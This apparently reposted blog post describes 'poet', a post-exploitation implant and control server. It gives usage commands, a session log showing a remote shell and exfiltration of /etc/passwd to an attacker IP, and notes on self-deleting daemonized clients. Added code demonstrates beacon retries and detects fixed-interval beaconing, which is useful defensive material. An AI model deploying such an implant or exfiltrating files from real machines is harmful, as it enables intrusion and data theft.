
poet - A Simple Post-Exploitation Tool

Tags: server poet port

poet is a simple post-exploitation tool.

The client runs on the target machine and is configured with the server's IP address and a beacon interval (how often to connect). If the server isn't listening when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running, the attacker gets a control shell for the client and can perform various actions on the target, including:
  • reconnaissance
  • remote shell
  • file exfiltration
  • download and execute
  • self-destruct
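The connect-or-sleep loop described above, and the server-side "-> VALID" check from the log further down, as an added example. This is not poet's own code: the hello token, the single-connection server and the free-port helper are constructed for this demonstration, and the client's real handshake is not shown on the page.

```python
import socket
import threading
import time

# Constructed handshake token for this example only; poet's real
# client/server protocol is not documented on the page.
HELLO = b"POET-HELLO\n"
HOST = "127.0.0.1"


def free_port():
    """Ask the kernel for an unused TCP port (stands in for poet's 443 / -p port)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((HOST, 0))
        return s.getsockname()[1]


def serve_once(port, ready=None):
    """Listen, accept one beacon and answer VALID or INVALID to its hello.

    Mirrors the "Connected By: (...) -> VALID" log line: the server should not
    hand a control shell to anything that cannot prove it is the expected client.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((HOST, port))
        srv.listen(1)
        if ready is not None:
            ready.set()
        conn, addr = srv.accept()
        with conn:
            verdict = b"VALID\n" if conn.recv(64) == HELLO else b"INVALID\n"
            conn.sendall(verdict)
            return addr, verdict


def start_server(port):
    """Run serve_once in a background thread; returns (thread, result dict)."""
    ready, result = threading.Event(), {}

    def run():
        result["addr"], result["verdict"] = serve_once(port, ready)

    t = threading.Thread(target=run, daemon=True)
    t.start()
    ready.wait(2)  # do not return until the socket is actually listening
    return t, result


def beacon(port, interval, max_attempts, hello=HELLO):
    """Client side: try to connect; on failure sleep `interval` seconds and retry.

    Returns (attempts_used, server_reply); server_reply is None when the server
    never came up within max_attempts.
    """
    for attempt in range(1, max_attempts + 1):
        try:
            with socket.create_connection((HOST, port), timeout=2) as s:
                s.sendall(hello)
                return attempt, s.recv(64)
        except OSError:  # ECONNREFUSED: nobody listening yet, sleep and retry
            time.sleep(interval)
    return max_attempts, None


def late_server_demo(interval=0.2, server_delay=0.7):
    """The write-up's scenario: the client beacons first, the server starts later."""
    port = free_port()
    outcome = {}
    client = threading.Thread(
        target=lambda: outcome.update(
            zip(("attempts", "reply"), beacon(port, interval, 50))),
        daemon=True,
    )
    client.start()
    time.sleep(server_delay)  # attacker is not ready yet; client keeps retrying
    srv, result = start_server(port)
    client.join(10)
    srv.join(2)
    outcome["seen_by_server"] = result.get("verdict")
    return outcome


if __name__ == "__main__":
    print(late_server_demo())
```

Run it and the first few attempts are refused and slept through; once the server binds, the next attempt succeeds and the reply is VALID. A client sending the wrong hello gets INVALID and no shell, which is the cheap check every listener like this should make before trusting an inbound connection.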


Example:

The scenario: an attacker has gained access to the victim's machine and downloaded and executed the client. She does not have the server running at this point, but that is fine; the client waits patiently. Eventually she is ready and starts the server, first opening a shell and running uname -a, then exfiltrating /etc/passwd. She then exits and detaches from the client, which keeps running on the target, waiting for the next opportunity to connect to the server. Later she connects again and self-destructs the client, which removes it from the target.

Victim's Machine (5.4.3.2):
$ ./poet-client 1.2.3.4 10  # poet-client daemonizes, so there's nothing to see
Warning: After running this command, you'll need to either run selfdestruct from the server or kill the poet-client process to stop the client.

Attacker's Machine (1.2.3.4):
$ sudo ./poet-server

                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] (06/28/15 03:58:42) Dropping privileges to uid: 501, gid: 20
[+] (06/28/15 03:58:42) Poet server started (port 443)
[+] (06/28/15 03:58:50) Connected By: ('127.0.0.1', 54494) -> VALID
[+] (06/28/15 03:58:50) Entering control shell
Welcome to posh, the Poet Shell!
Running `help' will give you a list of supported commands.
posh > help
Commands:
  chint
  dlexec
  exec
  exfil
  exit
  help
  recon
  selfdestruct
  shell
posh > shell
posh > [email protected] $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
posh > [email protected] $ ^D
posh > exfil /etc/passwd
posh : exfil written to archive/20150628/exfil/passwd-201506285917.txt
posh > ^D
[+] (06/28/15 03:59:18) Exiting control shell
[-] (06/28/15 03:59:18) Poet server terminated
$ sudo ./poet-server

                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] (06/28/15 03:59:26) Dropping privileges to uid: 501, gid: 20
[+] (06/28/15 03:59:26) Poet server started (port 443)
[+] (06/28/15 03:59:28) Connected By: ('127.0.0.1', 54542) -> VALID
[+] (06/28/15 03:59:28) Entering control shell
Welcome to posh, the Poet Shell!
Running `help' will give you a list of supported commands.
posh > selfdestruct
[!] WARNING: You are about to permanently remove the client from the target.
    You will immediately lose access to the target. Continue? (y/n) y
[+] (06/28/15 03:59:33) Exiting control shell
[-] (06/28/15 03:59:33) Poet server terminated

Usage:

Poet is easy to use and requires nothing more than the Python 2.7 standard library. To test it out locally, a typical invocation looks like:

Terminal 1:
$ ./poet-client 127.0.0.1 1 --debug --no-selfdestruct
By default, the Poet client daemonizes and deletes itself from disk, so that behavior is suppressed using the --debug and --no-selfdestruct flags.

Terminal 2:
$ sudo ./poet-server
By default the server needs to be run as root (with sudo) because the port it binds to, 443, is a privileged port; as the startup log above shows, it drops privileges once the socket is bound. If that makes you uncomfortable, omit sudo and pass the same -p port to both the client and the server. Pick a high port (1024 or above), which needs no root to bind.

Client:

$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [--debug] [--no-daemon] [--no-selfdestruct]
                   IP [INTERVAL]

positional arguments:
  IP                    Poet Server
  INTERVAL              Beacon Interval, in seconds. Default: 600

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  --debug               show debug messages. implies --no-daemon
  --no-daemon           don't daemonize
  --no-selfdestruct     don't selfdestruct
Poet is a client/server application. The client is executed on the target and beacons back to the server at a fixed interval. The only required argument is the IP address where the server is, or will be, running. It may optionally be followed by the beacon interval in seconds, which defaults to 600 (10 minutes). The port the client beacons out to can be set with -p and must match the server's. The remaining flags would not be used in "real" usage; they exist mainly for debugging.
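The fixed beacon interval described above is also the tell a defender hunts for: a client that reconnects every 600 seconds with no jitter stands out in firewall or flow logs, and refused attempts still show up there as outbound SYNs. The detector below is an added example, not part of the original post or of poet; the log format and the addresses in it are constructed for this illustration, and the jitter threshold is a tunable assumption, not a value from the page.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, median, pstdev

# Constructed firewall/flow log for this example. 10.0.0.5 carries a poet
# client beaconing at the default 600 s; 10.0.0.7 is ordinary browsing;
# 10.0.0.9 connected once and is ignored by the minimum-connection filter.
LOG = """\
2015-06-28T03:58:50Z src=10.0.0.5 dst=1.2.3.4 dport=443
2015-06-28T03:59:01Z src=10.0.0.7 dst=93.184.216.34 dport=443
2015-06-28T03:59:03Z src=10.0.0.7 dst=93.184.216.34 dport=443
2015-06-28T04:05:40Z src=10.0.0.7 dst=93.184.216.34 dport=443
2015-06-28T04:08:50Z src=10.0.0.5 dst=1.2.3.4 dport=443
2015-06-28T04:10:12Z src=10.0.0.9 dst=1.2.3.4 dport=443
2015-06-28T04:18:50Z src=10.0.0.5 dst=1.2.3.4 dport=443
2015-06-28T04:28:50Z src=10.0.0.5 dst=1.2.3.4 dport=443
2015-06-28T04:31:12Z src=10.0.0.7 dst=93.184.216.34 dport=443
2015-06-28T04:31:15Z src=10.0.0.7 dst=93.184.216.34 dport=443
2015-06-28T04:38:50Z src=10.0.0.5 dst=1.2.3.4 dport=443
2015-06-28T04:48:50Z src=10.0.0.5 dst=1.2.3.4 dport=443
"""

LINE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) dport=(\d+)$")


def parse_flows(text):
    """Group connection timestamps (epoch seconds) by (src, dst, dport)."""
    flows = defaultdict(list)
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip lines we do not understand rather than guess
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        ts = ts.replace(tzinfo=timezone.utc)
        flows[(m.group(2), m.group(3), int(m.group(4)))].append(ts.timestamp())
    return flows


def find_beacons(flows, min_conns=4, max_jitter=0.1):
    """Flag flows whose inter-connection gaps are nearly constant.

    jitter = stddev(gaps) / mean(gaps). A fixed-interval client like poet's
    scores 0; the constructed browsing flow scores above 1. max_jitter is the
    knob to loosen for implants that randomise their sleep.
    """
    hits = {}
    for key, stamps in flows.items():
        stamps = sorted(stamps)
        if len(stamps) < min_conns:
            continue
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            hits[key] = {
                "interval": round(median(gaps)),
                "connections": len(stamps),
                "jitter": round(jitter, 3),
            }
    return hits


if __name__ == "__main__":
    for key, info in find_beacons(parse_flows(LOG)).items():
        print(key, info)
```

On this log only 10.0.0.5 -> 1.2.3.4:443 is reported, with a 600 s interval over six connections. The operator can shorten the interval or change it during a session, so the detector keys on regularity rather than on any particular period; the price is that a client which adds random sleep pushes its jitter score up and needs a looser max_jitter to catch.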

Server:

$ ./poet-server -h
usage: poet-server [-h] [-p PORT] [-v]

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  -v, --version         prints the Poet version number and exits



This post first appeared on Effect Hacking - Hacking Tools, How To Guides An; please read the original post there.
